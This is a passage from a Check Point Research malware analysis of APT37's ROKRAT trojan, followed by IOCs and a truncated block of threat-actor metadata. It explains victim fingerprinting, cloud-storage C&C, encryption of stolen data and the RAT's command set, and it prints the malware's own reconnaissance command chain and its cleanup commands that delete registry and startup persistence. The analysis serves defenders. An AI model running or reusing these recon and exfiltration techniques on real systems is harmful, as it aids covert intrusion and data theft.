pCloud, Yandex Cloud, and OneDrive. ROKRAT also collects information about the machine\r\nto prevent further infection of unintended victims.\r\nWhile it’s no secret that ROKRAT has not significantly changed in the last few years, this can be attributed to its slick use of\r\nin-memory execution, disguising C\u0026C communication as potentially legitimate cloud communication, and additional layers\r\nof encryption to hinder network analysis and evade network signatures. As a result, there are not a lot of recent published\r\narticles about ROKRAT.\r\nGeneral Malware Structure\r\nMost samples of ROKRAT have a very simple WinMain function. All of the samples analyzed so far contain a data\r\ncollection functionality ( CollectMachineData , as seen in Figure 11 below) which is executed before the execution of the\r\nMain RAT thread ( MainRATThread ). This thread initializes the RAT and runs a loop to try and get commands from the\r\nC\u0026C, and then parses and executes them.\r\nThere are two additional functionalities embedded into the WinMain function that we only observed in a subset of the\r\nsamples. The first checks if the RAT is able to write to the TEMP directory ( CheckTemp , as seen in Figure 11 below). The\r\nsecond one creates a thread ( KillCertainProcessesThread ) to kill certain processes linked to previous infection vectors\r\nthat exploited vulnerabilities in Hancom Office.\r\nFigure 11 - An example of a WinMain function in ROKRAT.\r\nFigure 11 – An example of a WinMain function in ROKRAT.\r\nVictim Fingerprinting and Evasions\r\nOne of the first functions that ROKRAT calls when it executes is designed to collect data about the infected machine. In this\r\nphase of infection, this is likely to help the attackers distinguish if this is a desired target or not, and then act accordingly.\r\nIn this function (and many others), ROKRAT uses encrypted strings to prevent some of the techniques used from being\r\nvisible to static analysis. The information collected here includes whether the program is running on WOW64 (indicating\r\n32-bit applications running on 64-bit windows), the version of vmtoolsd.exe (VMWare Tools Daemon, if installed),\r\nSMBIOS data from the registry, and the system BIOS version from the registry as well.\r\nhttps://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/\r\nPage 8 of 15\n\nThe RAT also collects the username, machine name, and the full path to the executable file where the RAT is executing. The\r\nlatter is important because the infection chain usually involves injecting a ROKRAT PE file into an existing process’s\r\nmemory. In other words, this allows the attackers to see if ROKRAT is executing in the expected process, such\r\nas  powershell.exe  or  notepad.exe . Finally, the function checks to see if the executable has permission to create a file for\r\nwriting under  C:\\Windows .\r\nFigure 12 - CollectMachineData collects various information about the infected machine.\r\nFigure 12 – CollectMachineData collects various information about the infected machine.\r\nWhile a lot of the target’s data is collected in the function mentioned above, there is another data collection function that\r\nruns in the context of the main RAT thread before ROKRAT starts accepting commands. This second function check calls\r\nthe  IsDebuggerPresent  API, storing the result as a character (0 or 1). In addition, it calls a function to grab a screenshot of\r\nthe machine.\r\nThe data collection carried out in the main thread will be executed, sending the collected each time ROKRAT attempts to get\r\ncommands.\r\nIn this same function, some samples also check if there is a running process named  360Tray.exe , a process that is part of\r\nan antivirus software called 360 Total Security. The result is stored in a global Boolean variable and is accessed in a separate\r\nfunction used to execute shellcode payloads. Interestingly, if the process was found, ROKRAT doubles the timeout period it\r\nwaits for the shellcode to finish running from 24 seconds to 48 seconds. If the shellcode runs past the timeout period\r\nand  360Tray.exe  was not previously detected, ROKRAT attempts to terminate the shellcode thread.\r\nAs previously mentioned, some ROKRAT samples execute a thread called  KillCertainProcessesThread . This thread kills\r\ntwo processes,  gbb.exe  and  gswin32c.exe , which are responsible for parsing postscript data in Hancom Office. In the\r\npast, ROKRAT samples have come from malicious HWP documents that exploit these processes to gain code execution.\r\nMost likely, this is code left over from trying to clean any traces of exploitation from previous campaigns.\r\nInstead of using hardcoded or encrypted strings for these process names, ROKRAT instead contains a simple hashing\r\nalgorithm that determines a process name based on an integer value. It works in the following way:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\ndef calculate_hash(process_name):\r\nhash_value = 5381 # Initial value\r\nfor current_char in process_name.upper():\r\nhash_value = ord(current_char) + 33 * hash_value\r\nreturn hash_value \u0026 0xFFFFFFFF # Return as 32-bit integer\r\ndef calculate_hash(process_name): hash_value = 5381 # Initial value for current_char in process_name.upper(): hash_value\r\n= ord(current_char) + 33 * hash_value return hash_value \u0026 0xFFFFFFFF # Return as 32-bit integer\r\ndef calculate_hash(process_name):\r\n hash_value = 5381 # Initial value\r\n for current_char in process_name.upper():\r\n hash_value = ord(current_char) + 33 * hash_value\r\n return hash_value \u0026 0xFFFFFFFF # Return as 32-bit integer\r\nC\u0026C Communication\r\nIn each of the ROKRAT samples we analyzed, the malware configuration contained an ID number representing the cloud\r\ninfrastructure, and the API token to use it. The ID number can have the following values to correspond to different cloud\r\nproviders, as well as a test mode that allows the RAT to communicate with the local machine:\r\n1 – Local machine (no cloud)\r\n3 – Dropbox\r\n4 – pCloud\r\n5 – Yandex\r\nFigure 13 - Switch case statement for the cloud storage provider.\r\nFigure 13 – Switch case statement for the cloud storage provider.\r\nhttps://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/\r\nPage 9 of 15\n\nFurther analysis indicates that there are usually two C\u0026C configurations, one used as the primary infrastructure and the\r\nsecond as a backup. In the latest samples we discovered, the primary C\u0026C was pCloud and the secondary was Yandex\r\nCloud.\r\nROKRAT starts with initializing the token and then gets the folder content from the C\u0026C to make sure it has access and the\r\ntoken is valid:\r\nFigure 14 - GET request headers to list folder directory in pCloud.\r\nFigure 14 – GET request headers to list folder directory in pCloud.\r\nThe names for the files that ROKRAT uses are generated based on  GetTickCount  API and random values from\r\nthe  rand  API with the time of execution as a seed.\r\nROKRAT uploads a file to the server that contains the following information about the victim machine:\r\nHardcoded value  0xBAADFEDE  – Used later in the C\u0026C communication\r\nIsDebuggerPresent  value\r\nScreenshot image the malware previously saved to the following path:  %TEMP%\\\u003c16 hex digits\u003e. tmp\r\nProcesses data –  pid :\u003cPID\u003e,name:\u003cprocess name\u003e,path:\u003cfile name\u003e  for every working process\r\nTick Count\r\nXOR keys – Used for decrypting commands and payloads from the C\u0026C\r\nGenerated filenames – Used later for downloading and executing payloads in certain commands\r\nIsWow64Process  flag\r\nWindows Version\r\nComputer Name\r\nUsername\r\nMachine Type – Obtained by querying  SMBiosData  registry value\r\nunder  HKEY_LOCAL_MACHINE \\SYSTEM\\CurrentControlSet\\Services\\mssmbios\\Data\r\nVMware tools version data\r\nSystem BIOS version\r\nTo further hide its tracks, ROKRAT labels the data collected about the victim’s machine as MP3:\r\nFigure 15 - POST request headers to send encrypted data gathered from the victim machine to pCloud.\r\nFigure 15 – POST request headers to send encrypted data gathered from the victim machine to pCloud.\r\nFirst, the data is XORed with a random four-byte key. For this reason, the data begins with a hardcoded four-byte\r\nvalue  0xBAADFEDE . As the attackers know the hardcoded value, they can derive the XOR key by XORing the first four\r\nbytes of the XORed data with  0xBAADFEDE  to retrieve the key. The XORed data is then encrypted with AES-CBC. Finally,\r\nthe AES key is encrypted with a hardcoded RSA public key to ensure that the payload can only be decrypted with the RSA\r\nprivate key.\r\nDespite the fact that C\u0026C communication is already encrypted in HTTPS traffic, ROKRAT takes it a step further by\r\nencrypting data uploaded to the C\u0026C with AES. When the malware initializes, it generates two random 16-byte values,\r\nwhich serve as a basis for the AES keys used to encrypt commands and payloads. The malware also comes with a hardcoded\r\n16-byte value, which is then XORed against the two randomized values. The result is two AES keys, one that is used to\r\nencrypt and decrypt commands, and one that is used to encrypt and decrypt payloads.\r\nROKRAT Commands\r\nEach command is identified by a single character. Some of the commands take arguments, and they are supplied just after\r\nthe command ID character. After the correct command is identified, the code parses the arguments according to the type of\r\ncommand. The following table lists the commands we discovered in ROKRAT, together with their expected arguments and\r\nactions:\r\nCommand\r\nID\r\nCommand\r\nMeaning\r\nArguments Description\r\n0\r\nStop\r\ncollecting\r\ndata\r\n– –\r\n1, 2\r\nExecute\r\nshellcode\r\nURL\r\nDownloads shellcode from the URL and runs it\r\nwith CreateThread . It writes Success or Failed\r\nto a file named out.txt . It also adds\r\ninformation about the victim’s computer and\r\nsends it back to the C\u0026C server.\r\nhttps://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/\r\nPage 10 of 15\n\nCommand\r\nID\r\nCommand\r\nMeaning\r\nArguments Description\r\n3, 4\r\nExecute\r\nshellcode\r\nwith a new\r\ntoken\r\nNew cloud API\r\ntoken\r\nInitializes cloud provider information and then\r\ndownloads shellcode from the C\u0026C server.\r\nROKRAT expects the shellcode to exist in the\r\ngenerated file name it gave the C\u0026C server at the\r\ninitial data collection. It then executes the\r\nshellcode with CreateThread and writes\r\nSuccess or Failed to a file named out.txt . It\r\nalso adds information about the victim’s\r\ncomputer and sends it back to the C\u0026C server.\r\n5, 6\r\nExecute PE\r\nfile\r\nURL\r\nDownloads a PE file from the URL, writes it to\r\nKB400928_doc.exe , and then executes it.\r\n7, 8, 9\r\nExecute PE\r\nfile with a\r\nnew token\r\nNew cloud API\r\ntoken\r\nInitializes cloud provider information and then\r\ndownloads a PE file from the C\u0026C server.\r\nROKRAT expects the shellcode to exist in the\r\ngenerated file name it gave the C\u0026C server at the\r\ninitial data collection. It writes the file to\r\nKB400928_doc.exe , and then executes it.\r\nc\r\nExfiltrate\r\nfiles\r\nFile/Directory to\r\nsearch.\r\nExtensions of files\r\nto gather – All,\r\nNormal (doc, xls,\r\nppt, txt, m4a, amr,\r\npdf, hwp) or specific\r\nextensions\r\nLooks for files specified by arguments and\r\nuploads them to the C\u0026C server.\r\nd Cleanup –\r\nCleanup of the whole flow, which differs from\r\nsample to sample.\r\ne\r\nRun a\r\ncommand\r\ncommand Executes a command with cmd.exe .\r\nf Cleanup –\r\nSimilar to the d command, but deletes fewer\r\nthings. It can vary from sample to sample.\r\nh\r\nEnumerate\r\nfiles on\r\ndrives\r\n–\r\nCollects drives’ info with the command dir /A\r\n/S : \u003e\u003e “%temp%/_.TMP”\r\ni\r\nSend victim\r\ndata to C\u0026C\r\n–\r\nGathers the victim’s information and sends it to\r\nthe C\u0026C server.\r\nj/b Kill session – Kills the RAT.\r\nUpon receiving the cleanup command ( d ), ROKRAT runs the following commands to delete persistence mechanisms not\r\ninitially used by the malware. They might be related to some post-infection activity.\r\nreg delete HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v OfficeBootPower /f \u0026\r\nreg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v OfficeBootPower /f \u0026\r\ndel c:\\programdata\\30\r\ndel \"% appdata %\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*.VBS\" \"% appdata %\\*.CMD\"\r\n\"% appdata %\\*.BAT\" \"% appdata %\\01\" \"% appdata %\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Startup\\. lnk \" \"% allusersprofile %\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Startup\\*. lnk \" /F /Q\r\nUpon receiving commands  1 – 4 , ROKRAT creates a file called out.txt, which contains information about the system:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nhttps://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/\r\nPage 11 of 15\n\ntasklist\u003e\u003e\"%temp%\\out.txt\" \u0026\r\necho ======================AppDataStartup\u003e\u003e\"%temp%\\out.txt\" \u0026\r\ndir /a \"%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"\u003e\u003e\"%temp%\\out.txt\" \u0026\r\necho ======================AllUsersProfileStartup\u003e\u003e\"%temp%\\out.txt\" \u0026\r\ndir /a \"%allusersprofile%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"\u003e\u003e\"%temp%\\out.txt\" \u0026\r\necho ======================SystemInfo\u003e\u003e\"%temp%\\out.txt\" \u0026\r\nsysteminfo\u003e\u003e\"%temp%\\out.txt\" \u0026\r\necho ======================RoutePrint\u003e\u003e\"%temp%\\out.txt\" \u0026\r\nroute print\u003e\u003e\"%temp%\\out.txt\" \u0026\r\necho ======================IpConfig\u003e\u003e\"%temp%\\out.txt\" \u0026\r\nipconfig /all\u003e\u003e\"%temp%\\out.txt\" \u0026\r\necho ======================ARP\u003e\u003e\"%temp%\\out.txt\" \u0026\r\narp -a\u003e\u003e\"%temp%\\out.txt\" \u0026\r\necho ======================Recent\u003e\u003e\"%temp%\\out.txt\" \u0026\r\ndir /a \"%appdata%\\Microsoft\\Windows\\Recent\"\u003e\u003e\"%temp%\\out.txt\" \u0026\r\necho ======================WMIC\u003e\u003e\"%temp%\\out.txt\" \u0026\r\nwmic startup \u003e\u003e \"%temp%\\out.txt\" \u0026\r\necho ======================LocalAppData\u003e\u003e\"%temp%\\out.txt\" \u0026\r\ndir /a \"%localappdata%\"\u003e\u003e\"%temp%\\out.txt\" \u0026\r\necho ======================AllUsersProfile\u003e\u003e\"%temp%\\out.txt\" \u0026\r\ndir /a \"%allusersprofile%\"\u003e\u003e\"%temp%\\out.txt”\r\ntasklist\u003e\u003e\"%temp%\\out.txt\" \u0026 echo ======================AppDataStartup\u003e\u003e\"%temp%\\out.txt\" \u0026 dir /a\r\n\"%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"\u003e\u003e\"%temp%\\out.txt\" \u0026 echo\r\n======================AllUsersProfileStartup\u003e\u003e\"%temp%\\out.txt\" \u0026 dir /a\r\n\"%allusersprofile%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"\u003e\u003e\"%temp%\\out.txt\" \u0026 echo\r\n======================SystemInfo\u003e\u003e\"%temp%\\out.txt\" \u0026 systeminfo\u003e\u003e\"%temp%\\out.txt\" \u0026 echo\r\n======================RoutePrint\u003e\u003e\"%temp%\\out.txt\" \u0026 route print\u003e\u003e\"%temp%\\out.txt\" \u0026 echo\r\n======================IpConfig\u003e\u003e\"%temp%\\out.txt\" \u0026 ipconfig /all\u003e\u003e\"%temp%\\out.txt\" \u0026 echo\r\n======================ARP\u003e\u003e\"%temp%\\out.txt\" \u0026 arp -a\u003e\u003e\"%temp%\\out.txt\" \u0026 echo\r\n======================Recent\u003e\u003e\"%temp%\\out.txt\" \u0026 dir /a\r\n\"%appdata%\\Microsoft\\Windows\\Recent\"\u003e\u003e\"%temp%\\out.txt\" \u0026 echo\r\n======================WMIC\u003e\u003e\"%temp%\\out.txt\" \u0026 wmic startup \u003e\u003e \"%temp%\\out.txt\" \u0026 echo\r\n======================LocalAppData\u003e\u003e\"%temp%\\out.txt\" \u0026 dir /a \"%localappdata%\"\u003e\u003e\"%temp%\\out.txt\" \u0026 echo\r\n======================AllUsersProfile\u003e\u003e\"%temp%\\out.txt\" \u0026 dir /a \"%allusersprofile%\"\u003e\u003e\"%temp%\\out.txt”\r\ntasklist\u003e\u003e\"%temp%\\out.txt\" \u0026\r\necho ======================AppDataStartup\u003e\u003e\"%temp%\\out.txt\" \u0026\r\ndir /a \"%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"\u003e\u003e\"%temp%\\out.txt\" \u0026\r\necho ======================AllUsersProfileStartup\u003e\u003e\"%temp%\\out.txt\" \u0026\r\ndir /a \"%allusersprofile%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"\u003e\u003e\"%temp%\\out.txt\" \u0026\r\necho ======================SystemInfo\u003e\u003e\"%temp%\\out.txt\" \u0026\r\nsysteminfo\u003e\u003e\"%temp%\\out.txt\" \u0026\r\necho ======================RoutePrint\u003e\u003e\"%temp%\\out.txt\" \u0026\r\nroute print\u003e\u003e\"%temp%\\out.txt\" \u0026\r\necho ======================IpConfig\u003e\u003e\"%temp%\\out.txt\" \u0026\r\nipconfig /all\u003e\u003e\"%temp%\\out.txt\" \u0026\r\necho ======================ARP\u003e\u003e\"%temp%\\out.txt\" \u0026\r\narp -a\u003e\u003e\"%temp%\\out.txt\" \u0026\r\necho ======================Recent\u003e\u003e\"%temp%\\out.txt\" \u0026\r\ndir /a \"%appdata%\\Microsoft\\Windows\\Recent\"\u003e\u003e\"%temp%\\out.txt\" \u0026\r\necho ======================WMIC\u003e\u003e\"%temp%\\out.txt\" \u0026\r\nwmic startup \u003e\u003e \"%temp%\\out.txt\" \u0026\r\nhttps://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/\r\nPage 12 of 15\n\necho ======================LocalAppData\u003e\u003e\"%temp%\\out.txt\" \u0026\r\ndir /a \"%localappdata%\"\u003e\u003e\"%temp%\\out.txt\" \u0026\r\necho ======================AllUsersProfile\u003e\u003e\"%temp%\\out.txt\" \u0026\r\ndir /a \"%allusersprofile%\"\u003e\u003e\"%temp%\\out.txt”\r\nConclusion\r\nIn this report, we describe new activity by the notorious North Korean threat actor APT37. We discuss several different\r\ninfection chains, most of which result in a ROKRAT payload. These infection chains show that since 2022, this group has\r\nstopped heavily relying on malicious documents to deliver malware and instead begun to hide payloads inside oversized\r\nLNK files. This method can trigger an equally effective infection chain by a simple double click, one that is more reliable\r\nthan n-day exploits or the Office macros which require additional clicks to launch.\r\nAlthough we found that ROKRAT has not changed a lot recently, we see that the loaders being used to deploy it have indeed\r\nchanged, shifting to the LNK method. In fact, this is the first time we saw ROKRAT delivered with an LNK infection chain,\r\nsimilar to the one used to deploy GOLDBACKDOOR. It is important to note that this does not mean APT37 no longer uses\r\nmalicious documents, as we found evidence of such use as recently as April 2023.\r\nWe also analyzed several newer samples of ROKRAT and described the commands that it accepts, which helps us shed some\r\nlight on the malware’s internal mechanisms and capabilities. Check Point Research continues to track this tool, which is\r\nimperative as APT37 is still using it while also continuing to alter the infection chains.\r\nThis report, together with other recent reports on ROKRAT versions for Android and macOS, shows that APT37 continues\r\nto pose a considerable threat, launching multiple campaigns across the platforms and significantly improving its malware\r\ndelivery methods.\r\nCheck Point Customers remain protected:\r\nThreat Emulation provides Comprehensive coverage of attack tactics, file-types, and operating systems, powered by\r\nThreatCloud AI- the brain behind all of Check Point’s Security. Every file received via email or downloaded by a user\r\nthrough a web browser is sent to the Threat Emulation sandbox to inspect for malware.\r\nHarmony Endpoint provides comprehensive endpoint protection at the highest security level, including Full attack\r\ncontainment and remediation to quickly restore any infected systems, High catch rates and low false positives ensuring\r\nsecurity efficacy and effective prevention.\r\nTE Protections:\r\nTrojan.Wins.SusLNK.A\r\nTrojan.Wins.SusLNK.B\r\nInjector.Win.RemoteThread.A\r\nTechnique.Win.MalOfficeVBA.la.D\r\nExploit.Win.MalChildren.la.A\r\nHEP Protections:\r\nTechnique.Win.EmbedExeLnk.A\r\nTechnique.Win.EmbedExeLnk.B\r\nIOCs\r\nFile Hashes\r\nFile Name SHA-256\r\n(0722)상임위원회 및 상설\r\n특별위원회 위원 명단(최\r\n종).zip\r\n1c5b9409243bfb81a5924881cc05f63a301a3a7ce214830c7a83aeb2485cc5c3\r\n(0722)상임위원회 및 상설\r\n특별위원회 위원 명단(최\r\n종).lnk\r\ncb4c7037c7620e4ce3f8f43161b0ec67018c09e71ae4cea3018104153fbed286\r\n202207221.bat 240e7bd805bd7f2d17217dd4cebc03ac37ee60b7fb1264655cfd087749db647a\r\n사례비_지급의뢰서.doc 12ecabf01508c40cfea1ebc3958214751acfb1cd79a5bf2a4b42ebf172d7381b\r\nhttps://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/\r\nPage 13 of 15\n\nFile Name SHA-256\r\nprojects in Libya.zip 00d88009fa50bfab849593291cce20f8b2f2e2cf2428d9728e06c69fced55ed5\r\nPipelines Profile (Elfeel-Sharara-Mellitah + Wafa –\r\nMellitah).lnk\r\n6753933cd54e4eba497c48d63c7418a8946b4b6c44170105d489d29f1fe11494\r\n230130.bat 732fca9be66ba2c40c5d05845540207b9e1480e609d767aff63895bf49d33a81\r\nsecurityMail (1).zip eb03f8b8e41b3ad27ccdecb092111e2c3c010436ad59add42755e2af04762b67\r\nsecurityMail_1031.html.lnk 050c65d45e5f21018aa940f0188c4aa1318ac3df865d901f8643ed7ce4a4b52c\r\nsecurityMail_1101.html.lnk 5a3f1d14b9cc4890db64fbc41818d7039f25b0120574dcdec4e20d13e6b2740c\r\n27868.bat c4029a2f1d0c07ae2b388b5a4076fba41e57af0dd0d2d0f86844464f22d63861\r\n11702.zip\r\n17399.zip\r\n9a4c61cdf0e291dc364c568aa161f744f59065efeafc72a3f892e12cbf88fc5b\r\nmfc100.dll 0e926d8b6fbf6f14a2a19d4d4af843253f9f5f6de337956a12dde279f3321d78\r\n– (ISO file) 6234ef67435dfcb65bd661b5f3bb0b77b82fe6cdd2109b6dfb9dea1b65a17d5d\r\n북 외교관 선발파견 및 해\r\n외공관.lnk\r\n479894be4c5dec0992ad3c5b21fb1423643996d80d59dcca76386bb325dc811e\r\n북한외교정책결정과\r\n정.lnk\r\nc5c05f9df89fc803884fed2bd20a3824eae95eeb34a1827bf5210e4ac17beadd\r\n230401.bat\r\n230402.bat\r\n70f9216f0c5badb24120f74270dbbc5100b07c4fc6eb45f6652b00882290a73c\r\n질문지.doc 3252345b2640efc44cdd98667dbd25806ee2316d1e01eec488fd678e885aa960\r\n– (LNK file) 1e0b5d6b85fca648061fdaf2830c5a90248519e81e78122467c29beeb78daa1e\r\n– (LNK file) f92297c4efabba98befeb992a009462d1aba6f3c3a11210a7c054ff5377f0753\r\n230415.bat 06431a5d8f6262cc3db39d911a920f793fa6c648be94daf789c11cc5514d0c3d\r\nURLs\r\nhxxps[://]api[.]onedrive[.]com/v1[.]0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBaFFNUDZlZzhhUkZiN0xVMUNPQ2YzeE5vVFU_ZT1wZ\r\nhxxps[://]api[.]onedrive[.]com/v1[.]0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBdTJteTF4aDZ0OFhkSUpseW14b21abFd2WW8_ZT15SjJT\r\nhxxps[://]api[.]onedrive[.]com/v1[.]0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBdTJteTF4aDZ0OFhnUjJNem1zOG5oUndvLTZCP2U9akhIQ\r\nhxxps[://]api[.]onedrive[.]com/v1[.]0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBalFOTHZFRV9DVU9iUFdnLXhPZG8xRXFYckU_ZT1BM\r\nhxxps[://]api[.]onedrive[.]com/v1[.]0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRiZnpnVU14TmJJbkM2Q0k_ZT1WZE\r\nhxxps[://]1erluw[.]bl[.]files[.]1drv[.]com/y4mjq91jEOFfIt8XWokhkvDA3nd2tPKC9x6YXe5KPoia1IoxaHAT0f4N[…]8IqzILVZkrM48fYGI1jkeY\r\nIRenUX4NuenWy_g/my[.]jpg\r\nhxxps[://]u9izog[.]dm[.]files[.]1drv[.]com/y4mKSGc6jShxeCkGYNOnZdeG42N9DXsT4dFh5t6umtqb8bI9VePGNlZG7GP_-\r\nK9ly6IW0xeiUqMR8o6Sk9pGqnPraGVk-PxQce9pcUKcGPoKvXYaPqoiBNLDb3KK94OjeEV0RiejfEGjZ1ccTQqeWZZ0_DnN4T5NGFZRCkc4ZvlJERfXrb5JgWm1U3gC4leSiTrTtV12N\r\nhxxps[://]qb3oaq[.]bl[.]files[.]1drv[.]com/y4mHRkXCvSNkEazYL8KsgjxXW3y4EfgcyTsS_t5Wi6fefz383ova6apylWD0q0dsmeV2UbuXHYDd_\r\nfJ8cPvgLhX1dYRSVWpxXnpKq1GiHngnCioOASAeaS33ztlC74MpGEWsDuNksijGCqmtnIelhg-FBefDcwLwqsbCH01dRolRMhazBj1ZxYizw_CyFwdRbApbmUCNOQ/dragon32[.]zip\r\nhxxps[://]link[.]b4a[.]app/download[.]html?search=cHJvamVjdHMgaW4gTGlieWEuemlw\r\nhxxps[://]docx1[.]b4a[.]app/download[.]html?\r\nid=88\u0026search=tuh3m0xez3npqzr4terfd2zhsnzasgt1zedgawjhvxflazkwyudwewzieglimli1tg5safltegw=\r\nhxxps[://]naver-file[.]com/download/list[.]php?q=e1\u002618467=41\r\nDomains\r\nlink[.]b4a[.]app\r\ndocx1[.]b4a[.]app\r\nnaver-file[.]com\r\nnate-download[.]com\r\ndaum-store[.]com\r\nnaver-storage[.]com\r\nhttps://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/\r\nPage 14 of 15\n\nSource: https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/\r\nhttps://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/\r\nPage 15 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/" ], "report_names": [ "chain-reaction-rokrats-missing-link" ], "threat_actors": [ { "id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e", "created_at": "2025-08-07T02:03:25.082908Z", "updated_at": "2026-04-10T02:00:03.744649Z", "deleted_at": null, "main_name": "NICKEL FOXCROFT", "aliases": [ "APT37 ", "ATK4 ", "Group 123 ", "InkySquid ", "Moldy Pisces ", "Operation Daybreak ", "Operaton Erebus ", "RICOCHET CHOLLIMA ", "Reaper ", "ScarCruft ", "TA-RedAnt ", "Venus 121 " ], "source_name": "Secureworks:NICKEL FOXCROFT", "tools": [ "Bluelight", "Chinotto", "GOLDBACKDOOR", "KevDroid", "KoSpy", "PoorWeb", "ROKRAT", "final1stpy" ], "source_id": "Secureworks", "reports": null }, { "id": "aa65d2c9-a9d7-4bf9-9d56-c8de16eee5f4", "created_at": "2025-08-07T02:03:25.096857Z", "updated_at": "2026-04-10T02:00:03.659118Z", "deleted_at": null, "main_name": "NICKEL JUNIPER", "aliases": [ "Konni", "OSMIUM ", "Opal Sleet " ], "source_name": "Secureworks:NICKEL JUNIPER", "tools": [ "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf", "created_at": "2023-01-06T13:46:38.626906Z", "updated_at": "2026-04-10T02:00:03.043681Z", "deleted_at": null, "main_name": "Tick", "aliases": [ "G0060", "Stalker Taurus", "PLA Unit 61419", "Swirl Typhoon", "Nian", "BRONZE BUTLER", "REDBALDKNIGHT", "STALKER PANDA" ], "source_name": "MISPGALAXY:Tick", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b43c8747-c898-448a-88a9-76bff88e91b5", "created_at": "2024-02-02T02:00:04.058535Z", "updated_at": "2026-04-10T02:00:03.545252Z", "deleted_at": null, "main_name": "Opal Sleet", "aliases": [ "Konni", "Vedalia", "OSMIUM" ], "source_name": "MISPGALAXY:Opal Sleet", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bbe36874-34b7-4bfb-b38b-84a00b07042e", "created_at": "2022-10-25T15:50:23.375277Z", "updated_at": "2026-04-10T02:00:05.327922Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "APT37", "InkySquid", "ScarCruft", "Group123", "TEMP.Reaper", "Ricochet Chollima" ], "source_name": "MITRE:APT37", "tools": [ "BLUELIGHT", "CORALDECK", "KARAE", "SLOWDRIFT", "ROKRAT", "SHUTTERSPEED", "POORAIM", "HAPPYWORK", "Final1stspy", "Cobalt Strike", "NavRAT", "DOGCALL", "WINERACK" ], "source_id": "MITRE", "reports": null }, { "id": "552ff939-52c3-421b-b6c9-749cbc21a794", "created_at": "2023-01-06T13:46:38.742547Z", "updated_at": "2026-04-10T02:00:03.08515Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "Operation Daybreak", "Red Eyes", "ScarCruft", "G0067", "Group123", "Reaper Group", "Ricochet Chollima", "ATK4", "APT 37", "Operation Erebus", "Moldy Pisces", "APT-C-28", "Group 123", "InkySquid", "Venus 121" ], "source_name": "MISPGALAXY:APT37", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "54e55585-1025-49d2-9de8-90fc7a631f45", "created_at": "2025-08-07T02:03:24.563488Z", "updated_at": "2026-04-10T02:00:03.715427Z", "deleted_at": null, "main_name": "BRONZE BUTLER", "aliases": [ "CTG-2006 ", "Daserf", "Stalker Panda ", "Swirl Typhoon ", "Tick " ], "source_name": "Secureworks:BRONZE BUTLER", "tools": [ "ABK", "BBK", "Casper", "DGet", "Daserf", "Datper", "Ghostdown", "Gofarer", "MSGet", "Mimikatz", "Netboy", "RarStar", "Screen Capture Tool", "ShadowPad", "ShadowPy", "T-SMB", "down_new", "gsecdump" ], "source_id": "Secureworks", "reports": null }, { "id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b", "created_at": "2022-10-25T16:07:23.419513Z", "updated_at": "2026-04-10T02:00:04.591062Z", "deleted_at": null, "main_name": "Bronze Butler", "aliases": [ "Bronze Butler", "CTG-2006", "G0060", "Operation ENDTRADE", "RedBaldNight", "Stalker Panda", "Stalker Taurus", "Swirl Typhoon", "TEMP.Tick", "Tick" ], "source_name": "ETDA:Bronze Butler", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "9002 RAT", "AngryRebel", "Blogspot", "Daserf", "Datper", "Elirks", "Farfli", "Gh0st RAT", "Ghost RAT", "HOMEUNIX", "HidraQ", "HomamDownloader", "Homux", "Hydraq", "Lilith", "Lilith RAT", "McRAT", "MdmBot", "Mimikatz", "Minzen", "Moudour", "Muirim", "Mydoor", "Nioupale", "PCRat", "POISONPLUG.SHADOW", "Roarur", "RoyalRoad", "ShadowPad Winnti", "ShadowWali", "ShadowWalker", "SymonLoader", "WCE", "Wali", "Windows Credential Editor", "Windows Credentials Editor", "XShellGhost", "XXMM", "gsecdump", "rarstar" ], "source_id": "ETDA", "reports": null }, { "id": "9b02c527-5077-489e-9a80-5d88947fddab", "created_at": "2022-10-25T16:07:24.103499Z", "updated_at": "2026-04-10T02:00:04.867181Z", "deleted_at": null, "main_name": "Reaper", "aliases": [ "APT 37", "ATK 4", "Cerium", "Crooked Pisces", "G0067", "Geumseong121", "Group 123", "ITG10", "InkySquid", "Moldy Pisces", "Opal Sleet", "Operation Are You Happy?", "Operation Battle Cruiser", "Operation Black Banner", "Operation Daybreak", "Operation Dragon messenger", "Operation Erebus", "Operation 